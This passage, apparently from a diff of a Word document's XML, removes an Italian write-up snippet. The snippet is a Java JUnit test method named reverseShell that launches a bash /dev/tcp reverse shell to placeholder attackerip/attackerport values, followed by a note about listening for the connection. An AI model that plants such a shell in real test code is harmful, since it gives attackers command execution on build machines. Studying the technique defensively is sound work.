-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">public </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>class</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>AppTest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>@</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Test</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  public void </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>reverseShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>){</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="C586C0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>try</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>String[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>] command = {</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"/bin/bash"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"-c"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"exec 5&lt;&gt;/dev/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>attackerip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>attackerport;cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done;"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">}; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      Process </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>process</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = new </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ProcessBuilder</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(command</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>).start</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>} catch (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Exception</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>e){</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>  }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="it-IT"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">(Ciò presuppone di essere in ascolto tramite </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> sul proprio </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>attackerip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> e sulla porta </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>attackerport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> per ottenere la shell).</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -21282,18 +20303,9 @@
       </w:r>
       <w:r>
         <w:br/>
